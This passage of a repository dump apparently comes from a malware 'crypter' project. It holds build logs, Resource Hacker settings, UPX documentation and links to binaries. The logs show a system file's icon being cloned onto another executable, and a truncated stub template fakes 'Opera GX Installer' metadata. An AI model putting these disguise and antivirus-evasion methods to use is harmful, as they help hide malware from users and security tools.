2=C:\Windows\splwow64.exe 29 | 3=C:\Users\aarbe\Desktop\lol.exe 30 | 4=C:\Windows\SysWOW64\eudcedit.exe 31 | 5= 32 | 6= 33 | 7= 34 | 8= 35 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/res.log: -------------------------------------------------------------------------------- 1 | [29 Jul 2021, 16:05:20] 2 | 3 | Current Directory: 4 | C:\Users\aarbe\Desktop\YAsbyvQv\FileCloner\bin\Debug 5 | 6 | Commandline: 7 | C:\Users\aarbe\Desktop\YAsbyvQv\FileCloner\bin\Debug\res\\res.exe -addoverwrite C:\Users\aarbe\Desktop\ze.exe, C:\Users\aarbe\Desktop\ze.exe, C:\Windows\splwow64.exe, icongroup, 1,0 8 | 9 | Open : C:\Users\aarbe\Desktop\ze.exe 10 | Save : C:\Users\aarbe\Desktop\ze.exe 11 | Resource: C:\Windows\splwow64.exe 12 | 13 | 14 | Success! 15 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm00.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm00.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm01.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm02.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm03.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm04.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm05.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm06.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm09.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm09.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm10.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm11.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm12.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/bm14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/bm14.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/desktop.ini: -------------------------------------------------------------------------------- 1 | [ViewState] 2 | Mode= 3 | Vid= 4 | FolderType=Generic 5 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/help.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/help.html -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/Help/resource_hacker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/Help/resource_hacker.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/ReadMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/ReadMe.txt -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/changes.txt: -------------------------------------------------------------------------------- 1 | Changes in 4.5.28 2 | Update: Major changes (and improvements) to the commandline syntax 3 | Changes in 4.5.28 4 | Update: Numerous changes and improvements to command line support. 5 | Update: Filenames in resource scripts are no longer required to be 6 | enclosed within double quotes unless they contain spaces. 7 | Changes in 4.4.24 8 | Bugfix: The toolbar state wasn't being preserved between sessions 9 | Changes in 4.3.20 10 | Bugfixes: Numerous fixes to commandline processing 11 | Bugfixes: Other minor fixes 12 | Changes in 4.2.5 13 | Bugfix: Compiling Delphi form resources was buggy. 14 | Bugfix: Adding a resource to a file without any resources was broken 15 | New: Can now change a text resource's format (unicode, UTF-8, ANSI) 16 | Changes in 4.2.4 17 | Bugfix: Error when compiling ansi encoded *.rc files 18 | Bugfix: RCDATA resources not displayed in their optimal format 19 | Bugfix: Error when trying to display 'compressed' resources 20 | Bugfix: 'Compressed' files can no longer be modified and saved 21 | Changes in 4.2.3 22 | Bugfix: Significant bug in the recompiler 23 | Bugfix: Minor bug displaying animated cursors 24 | Changes in 4.2.2 25 | Bugfix: Some monochrome images weren't being displayed 26 | Bugfix: Removed extraneous button in "Import Resources" dialog 27 | Bugfix: Manifest resources were being converted to UCS-2 format. 28 | Modified: Increased font sizes in all dialogs 29 | Changes in 4.2.1 (from 4.2.0) 30 | Bugfix: occasional Delphi form was not being decompiled 31 | Bugfix: hiding the toolbar disabled hide/show dialogs/menus. -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/info.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/info.res -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/res.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/res/res.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/res.ini: -------------------------------------------------------------------------------- 1 | [Setup] 2 | left=560 3 | top=300 4 | width=800 5 | height=440 6 | MaximizedState=0 7 | vsplit=200 8 | LastDir= 9 | BkColor=16185078 10 | DefaultLang=0 11 | ToolbarSize=1 12 | 13 | [MonospaceFont] 14 | Name=Courier New 15 | Size=9 16 | Color=-16777208 17 | Style=0 18 | 19 | [Font] 20 | Name=Tahoma 21 | Size=9 22 | Color=-16777208 23 | CharSet=1 24 | Style=0 25 | 26 | [MRU List] 27 | 1=C:\Users\aarbe\Desktop\ze.exe 28 | 2=C:\Windows\splwow64.exe 29 | 3=C:\Users\aarbe\Desktop\lol.exe 30 | 4=C:\Windows\SysWOW64\eudcedit.exe 31 | 5= 32 | 6= 33 | 7= 34 | 8= 35 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/res/res.log: -------------------------------------------------------------------------------- 1 | [29 Jul 2021, 16:01:46] 2 | 3 | Current Directory: 4 | C:\Users\aarbe\Desktop\YAsbyvQv\FileCloner\bin\Debug 5 | 6 | Commandline: 7 | C:\Users\aarbe\Desktop\YAsbyvQv\FileCloner\bin\Debug\res\\res.exe -addoverwrite C:\Users\aarbe\Desktop\ze.exe, C:\Users\aarbe\Desktop\ze.exe, C:\Windows\splwow64.exe, icongroup, 1,0 8 | 9 | Open : C:\Users\aarbe\Desktop\ze.exe 10 | Save : C:\Users\aarbe\Desktop\ze.exe 11 | Resource: C:\Windows\splwow64.exe 12 | 13 | 14 | Success! 15 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/upx/BUGS: -------------------------------------------------------------------------------- 1 | ooooo ooo ooooooooo. ooooooo ooooo 2 | `888' `8' `888 `Y88. `8888 d8' 3 | 888 8 888 .d88' Y888..8P 4 | 888 8 888ooo88P' `8888' 5 | 888 8 888 .8PY888. 6 | `88. .8' 888 d8' `888b 7 | `YbodP' o888o o888o o88888o 8 | 9 | 10 | The Ultimate Packer for eXecutables 11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser 12 | https://upx.github.io 13 | 14 | 15 | Limitations and other things which are not (yet) supported: 16 | =========================================================== 17 | 18 | djgpp2/coff 19 | ----------- 20 | * all overlays (except Allegro pakfiles) are silently stripped 21 | 22 | dos/exe 23 | ------- 24 | * normal dos/exes with new exe headers 25 | * max ~24000 relocation records (...should be enough for everyone ;-) 26 | * exe + sys combined images 27 | 28 | watcom/le 29 | --------- 30 | * 16-bit selector alias fixups 31 | * 16-bit offset relocation for objects larger than 4 KiB 32 | * 16:16 fixups 33 | 34 | If you need any of the above (they're very rare), send us an URL of a 35 | test file. 36 | 37 | * 16-bit objects are not loaded into DOS memory 38 | * There is still a problem with the wdosx extender: if you compress a 39 | watcom/le file which does NOT contain the wdosx extender, and after this 40 | you bind the wdosx stub to the compressed file, then it will work. 41 | Otherwise it won't. 42 | * unpacked pmwlite compressed programs might not work when compressed 43 | with UPX (this is a bug in pmwunlite) 44 | 45 | win32/pe 46 | -------- 47 | * writable shared sections (`--force' *may* work) 48 | * certificates in the image 49 | * compressing files which contain a big BSS requires lots of memory 50 | during compression 51 | 52 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/upx/LICENSE: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP SIGNED MESSAGE----- 2 | 3 | 4 | ooooo ooo ooooooooo. ooooooo ooooo 5 | `888' `8' `888 `Y88. `8888 d8' 6 | 888 8 888 .d88' Y888..8P 7 | 888 8 888ooo88P' `8888' 8 | 888 8 888 .8PY888. 9 | `88. .8' 888 d8' `888b 10 | `YbodP' o888o o888o o88888o 11 | 12 | 13 | The Ultimate Packer for eXecutables 14 | Copyright (c) 1996-2000 Markus Oberhumer & Laszlo Molnar 15 | http://wildsau.idv.uni-linz.ac.at/mfx/upx.html 16 | http://www.nexus.hu/upx 17 | http://upx.tsx.org 18 | 19 | 20 | PLEASE CAREFULLY READ THIS LICENSE AGREEMENT, ESPECIALLY IF YOU PLAN 21 | TO MODIFY THE UPX SOURCE CODE OR USE A MODIFIED UPX VERSION. 22 | 23 | 24 | ABSTRACT 25 | ======== 26 | 27 | UPX and UCL are copyrighted software distributed under the terms 28 | of the GNU General Public License (hereinafter the "GPL"). 29 | 30 | The stub which is imbedded in each UPX compressed program is part 31 | of UPX and UCL, and contains code that is under our copyright. The 32 | terms of the GNU General Public License still apply as compressing 33 | a program is a special form of linking with our stub. 34 | 35 | As a special exception we grant the free usage of UPX for all 36 | executables, including commercial programs. 37 | See below for details and restrictions. 38 | 39 | 40 | COPYRIGHT 41 | ========= 42 | 43 | UPX and UCL are copyrighted software. All rights remain with the authors. 44 | 45 | UPX is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer 46 | UPX is Copyright (C) 1996-2000 Laszlo Molnar 47 | 48 | UCL is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer 49 | 50 | 51 | GNU GENERAL PUBLIC LICENSE 52 | ========================== 53 | 54 | UPX and the UCL library are free software; you can redistribute them 55 | and/or modify them under the terms of the GNU General Public License as 56 | published by the Free Software Foundation; either version 2 of 57 | the License, or (at your option) any later version. 58 | 59 | UPX and UCL are distributed in the hope that they will be useful, 60 | but WITHOUT ANY WARRANTY; without even the implied warranty of 61 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 62 | GNU General Public License for more details. 63 | 64 | You should have received a copy of the GNU General Public License 65 | along with this program; see the file COPYING. 66 | 67 | 68 | SPECIAL EXCEPTION FOR COMPRESSED EXECUTABLES 69 | ============================================ 70 | 71 | The stub which is imbedded in each UPX compressed program is part 72 | of UPX and UCL, and contains code that is under our copyright. The 73 | terms of the GNU General Public License still apply as compressing 74 | a program is a special form of linking with our stub. 75 | 76 | Hereby Markus F.X.J. Oberhumer and Laszlo Molnar grant you special 77 | permission to freely use and distribute all UPX compressed programs 78 | (including commercial ones), subject to the following restrictions: 79 | 80 | 1. You must compress your program with a completely unmodified UPX 81 | version; either with our precompiled version, or (at your option) 82 | with a self compiled version of the unmodified UPX sources as 83 | distributed by us. 84 | 2. This also implies that the UPX stub must be completely unmodfied, i.e. 85 | the stub imbedded in your compressed program must be byte-identical 86 | to the stub that is produced by the official unmodified UPX version. 87 | 3. The decompressor and any other code from the stub must exclusively get 88 | used by the unmodified UPX stub for decompressing your program at 89 | program startup. No portion of the stub may get read, copied, 90 | called or otherwise get used or accessed by your program. 91 | 92 | 93 | ANNOTATIONS 94 | =========== 95 | 96 | - You can use a modified UPX version or modified UPX stub only for 97 | programs that are compatible with the GNU General Public License. 98 | 99 | - We grant you special permission to freely use and distribute all UPX 100 | compressed programs. But any modification of the UPX stub (such as, 101 | but not limited to, removing our copyright string or making your 102 | program non-decompressible) will immediately revoke your right to 103 | use and distribute a UPX compressed program. 104 | 105 | - UPX is not a software protection tool; by requiring that you use 106 | the unmodified UPX version for your proprietary programs we 107 | make sure that any user can decompress your program. This protects 108 | both you and your users as nobody can hide malicious code - 109 | any program that cannot be decompressed is highly suspicious 110 | by definition. 111 | 112 | - You can integrate all or part of UPX and UCL into projects that 113 | are compatible with the GNU GPL, but obviously you cannot grant 114 | any special exceptions beyond the GPL for our code in your project. 115 | 116 | - We want to actively support manufacturers of virus scanners and 117 | similar security software. Please contact us if you would like to 118 | incorporate parts of UPX or UCL into such a product. 119 | 120 | 121 | 122 | Markus F.X.J. Oberhumer Laszlo Molnar 123 | markus.oberhumer@jk.uni-linz.ac.at ml1050@cdata.tvnet.hu 124 | 125 | Linz, Austria, 25 Feb 2000 126 | 127 | 128 | 129 | -----BEGIN PGP SIGNATURE----- 130 | Version: 2.6.3ia 131 | Charset: noconv 132 | 133 | iQCVAwUBOLaLS210fyLu8beJAQFYVAP/ShzENWKLTvedLCjZbDcwaBEHfUVcrGMI 134 | wE7frMkbWT2zmkdv9hW90WmjMhOBu7yhUplvN8BKOtLiolEnZmLCYu8AGCwr5wBf 135 | dfLoClxnzfTtgQv5axF1awp4RwCUH3hf4cDrOVqmAsWXKPHtm4hx96jF6L4oHhjx 136 | OO03+ojZdO8= 137 | =CS52 138 | -----END PGP SIGNATURE----- 139 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/upx/README: -------------------------------------------------------------------------------- 1 | ooooo ooo ooooooooo. ooooooo ooooo 2 | `888' `8' `888 `Y88. `8888 d8' 3 | 888 8 888 .d88' Y888..8P 4 | 888 8 888ooo88P' `8888' 5 | 888 8 888 .8PY888. 6 | `88. .8' 888 d8' `888b 7 | `YbodP' o888o o888o o88888o 8 | 9 | 10 | The Ultimate Packer for eXecutables 11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser 12 | https://upx.github.io 13 | 14 | 15 | 16 | WELCOME 17 | ======= 18 | 19 | Welcome to UPX ! 20 | 21 | Please don't forget to read the file LICENSE - UPX is distributed 22 | under the GNU General Public License (GPL) with special exceptions 23 | allowing the distribution of all compressed executables, including 24 | commercial programs. 25 | 26 | 27 | INTRODUCTION 28 | ============ 29 | 30 | UPX is an advanced executable file compressor. UPX will typically 31 | reduce the file size of programs and DLLs by around 50%-70%, thus 32 | reducing disk space, network load times, download times and 33 | other distribution and storage costs. 34 | 35 | Programs and libraries compressed by UPX are completely self-contained 36 | and run exactly as before, with no runtime or memory penalty for most 37 | of the supported formats. 38 | 39 | UPX supports a number of different executable formats, including 40 | Windows 95/98/ME/NT/2000/XP/CE programs and DLLs, DOS programs, 41 | and Linux executables and kernels. 42 | 43 | UPX is free software distributed under the term of the GNU General 44 | Public License. Full source code is available. 45 | 46 | UPX may be distributed and used freely, even with commercial applications. 47 | See the UPX License Agreement for details. 48 | 49 | UPX is rated number one in the well known Archive Comparison Test. Visit 50 | http://compression.ca/ . 51 | 52 | UPX aims to be Commercial Quality Freeware. 53 | 54 | 55 | SHORT DOCUMENTATION 56 | =================== 57 | 58 | 'upx program.exe' will compress a program or DLL. For best compression 59 | results try 'upx --brute program.exe'. 60 | 61 | Please see the file UPX.DOC for the full documentation. The files 62 | NEWS and BUGS also contain various tidbits of information. 63 | 64 | 65 | DISCLAIMER 66 | ========== 67 | 68 | UPX comes with ABSOLUTELY NO WARRANTY; for details see the file LICENSE. 69 | 70 | Having said that, we think that UPX is quite stable now. Indeed we 71 | have compressed lots of files without any problems. Also, the 72 | current version has undergone several months of beta testing - 73 | actually it's almost 8 years since our first public beta. 74 | 75 | This is the first production quality release, and we plan that future 76 | releases will be backward compatible with this version. 77 | 78 | Please report all problems or suggestions to the authors. Thanks. 79 | 80 | 81 | THE FUTURE 82 | ========== 83 | 84 | - AArch64 (64-bit ARM) for Linux and iOS. 85 | 86 | - The Linux approach could probably get ported to a lot of other Unix 87 | variants, at least for other i386 architectures it shouldn't be too 88 | much work. If someone sends me a fresh hard disk and an official 89 | FreeBSD/OpenBSD/NetBSD/Solaris/BeOS... CD I might take a look at it ;-) 90 | 91 | - We will *NOT* add any sort of protection and/or encryption. 92 | This only gives people a false feeling of security because 93 | by definition all protectors/compressors can be broken. 94 | And don't trust any advertisement of authors of other executable 95 | compressors about this topic - just do a websearch on "unpackers"... 96 | 97 | - Fix all remaining bugs - keep your reports coming ;-) 98 | 99 | - See the file PROJECTS in the source code distribution if you want 100 | to contribute. 101 | 102 | 103 | COPYRIGHT 104 | ========= 105 | 106 | Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer 107 | Copyright (C) 1996-2020 Laszlo Molnar 108 | Copyright (C) 2000-2020 John F. Reiser 109 | 110 | This program may be used freely, and you are welcome to 111 | redistribute it under certain conditions. 112 | 113 | This program is distributed in the hope that it will be useful, 114 | but WITHOUT ANY WARRANTY; without even the implied warranty of 115 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 116 | UPX License Agreement for more details. 117 | 118 | You should have received a copy of the UPX License Agreement along 119 | with this program; see the file LICENSE. If not, visit the UPX home page. 120 | 121 | 122 | Share and enjoy, 123 | Markus & Laszlo & John 124 | 125 | 126 | Markus F.X.J. Oberhumer Laszlo Molnar 127 | 128 | 129 | John F. Reiser 130 | 131 | 132 | 133 | [ The term UPX is a shorthand for the Ultimate Packer for eXecutables 134 | and holds no connection with potential owners of registered trademarks 135 | or other rights. ] 136 | 137 | [ Feel free to contact us if you have commercial compression requirements 138 | or interesting job offers. ] 139 | 140 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/upx/README.1ST: -------------------------------------------------------------------------------- 1 | ooooo ooo ooooooooo. ooooooo ooooo 2 | `888' `8' `888 `Y88. `8888 d8' 3 | 888 8 888 .d88' Y888..8P 4 | 888 8 888ooo88P' `8888' 5 | 888 8 888 .8PY888. 6 | `88. .8' 888 d8' `888b 7 | `YbodP' o888o o888o o88888o 8 | 9 | 10 | The Ultimate Packer for eXecutables 11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser 12 | https://upx.github.io 13 | 14 | 15 | MAJOR NEWS IN UPX 3 16 | =================== 17 | 18 | The main news since UPX 2 are: 19 | 20 | * new format: added support for linux elf/arm 21 | 22 | * better compression using the LZMA algorithm (option '--lzma') 23 | 24 | * better support for MacOS 25 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/upx/THANKS: -------------------------------------------------------------------------------- 1 | ooooo ooo ooooooooo. ooooooo ooooo 2 | `888' `8' `888 `Y88. `8888 d8' 3 | 888 8 888 .d88' Y888..8P 4 | 888 8 888ooo88P' `8888' 5 | 888 8 888 .8PY888. 6 | `88. .8' 888 d8' `888b 7 | `YbodP' o888o o888o o88888o 8 | 9 | 10 | The Ultimate Packer for eXecutables 11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser 12 | https://upx.github.io 13 | 14 | 15 | .___.. . 16 | | |_ _.._ ;_/ __ 17 | | [ )(_][ )| \_) 18 | -------------------- 19 | 20 | UPX would not be what it is today without the invaluable help of 21 | everybody who was kind enough to spend time testing it, using it 22 | in applications and reporting bugs. 23 | 24 | The following people made especially gracious contributions of their 25 | time and energy in helping to track down bugs, add new features, and 26 | generally assist in the UPX maintainership process: 27 | 28 | Adam Ierymenko 29 | for severals ideas for the Linux version 30 | Andi Kleen and Jamie Lokier 31 | for the /proc/self/fd/X and other Linux suggestions 32 | Andreas Muegge 33 | for the Win32 GUI 34 | Atli Mar Gudmundsson 35 | for several comments on the win32/pe stub 36 | Charles W. Sandmann 37 | for the idea with the stubless decompressor in djgpp2/coff 38 | Ice 39 | for debugging the PE headersize problem down 40 | Joergen Ibsen and d'b 41 | for the relocation & address optimization ideas 42 | John S. Fine 43 | for the new version of the dos/exe decompressor 44 | Lukundoo 45 | for beta testing 46 | Michael Devore 47 | for initial dos/exe device driver support 48 | Oleg V. Volkov 49 | for various FreeBSD specific informations 50 | The Owl & G-RoM 51 | for the --compress-icons fix 52 | Ralph Roth 53 | for reporting several bugs 54 | Salvador Eduardo Tropea 55 | for beta testing 56 | Stefan Widmann 57 | for the win32/pe TLS callback support 58 | The WINE project (http://www.winehq.com/) 59 | for lots of useful information found in their PE loader sources 60 | Natascha 61 | 62 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/upx/upx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/upx/upx.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/French Protector Build 230.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/French Protector Build 230.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/French Protector Build 230.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/French Protector Build 230.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/French Protector Build 230.pdb -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/French Protector Build 230.vshost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/French Protector Build 230.vshost.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/French Protector Build 230.vshost.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/French Protector Build 230.vshost.exe.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/French Protector Build 230.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | French Protector Build 230 6 | 7 | 8 | 9 | 10 | 11 | A strongly-typed resource class, for looking up localized strings, etc. 12 | 13 | 14 | 15 | 16 | Returns the cached ResourceManager instance used by this class. 17 | 18 | 19 | 20 | 21 | Overrides the current thread's CurrentUICulture property for all 22 | resource lookups using this strongly typed resource class. 23 | 24 | 25 | 26 | 27 | Looks up a localized string similar to 28 | using System; 29 | using System.Collections.Generic; 30 | //download using System.Diagnostics; 31 | using System.Net; 32 | using System.Reflection; 33 | using System.Runtime.InteropServices; 34 | using System.Security.Cryptography; 35 | using System.Text; 36 | using System.Threading; 37 | using System.Windows.Forms; 38 | 39 | //iamassembly [assembly: AssemblyTitle("Opera GX")] 40 | //iamassembly [assembly: AssemblyDescription("Opera GX Installer")] 41 | //iamassembly [assembly: AssemblyCompany("Opera Software")] 42 | //iamassembly [assembly: AssemblyProduct(" [rest of string was truncated]";. 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/Guna.UI2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/Guna.UI2.dll -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/Obfuscator/Obfuscator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/Obfuscator/Obfuscator.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/Obfuscator/dnlib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/Obfuscator/dnlib.dll -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/qweqwe.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/qweqwe.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/qweqwe.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/qweqwe.pdb -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm00.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm00.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm01.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm02.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm03.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm04.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm05.png: -------------------------------------------------------------------------------- 